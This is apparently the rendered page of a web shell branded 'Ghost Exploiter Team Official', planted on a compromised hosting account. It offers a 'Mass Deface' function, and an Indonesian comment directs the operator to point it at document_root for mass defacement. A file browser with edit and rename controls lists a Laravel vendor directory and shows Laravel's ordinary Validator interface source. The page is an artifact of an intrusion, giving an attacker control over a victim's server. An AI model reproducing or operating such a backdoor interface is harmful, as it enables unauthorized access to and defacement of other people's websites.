webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
Validation
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DataAwareRule.php
0.226KB
edt
ren
Factory.php
1.156KB
edt
ren
ImplicitRule.php
0.137KB
edt
ren
InvokableRule.php
0.433KB
edt
ren
Rule.php
0.428KB
edt
ren
UncompromisedVerifier.php
0.261KB
edt
ren
ValidatesWhenResolved.php
0.207KB
edt
ren
ValidationRule.php
0.398KB
edt
ren
Validator.php
1.356KB
edt
ren
ValidatorAwareRule.php
0.309KB
edt
ren
<?php namespace Illuminate\Contracts\Validation; use Illuminate\Contracts\Support\MessageProvider; interface Validator extends MessageProvider { /** * Run the validator's rules against its data. * * @return array * * @throws \Illuminate\Validation\ValidationException */ public function validate(); /** * Get the attributes and values that were validated. * * @return array * * @throws \Illuminate\Validation\ValidationException */ public function validated(); /** * Determine if the data fails the validation rules. * * @return bool */ public function fails(); /** * Get the failed validation rules. * * @return array */ public function failed(); /** * Add conditions to a given field based on a Closure. * * @param string|array $attribute * @param string|array $rules * @param callable $callback * @return $this */ public function sometimes($attribute, $rules, callable $callback); /** * Add an after validation callback. * * @param callable|string $callback * @return $this */ public function after($callback); /** * Get all of the validation error messages. * * @return \Illuminate\Support\MessageBag */ public function errors(); }
<=Back
Liking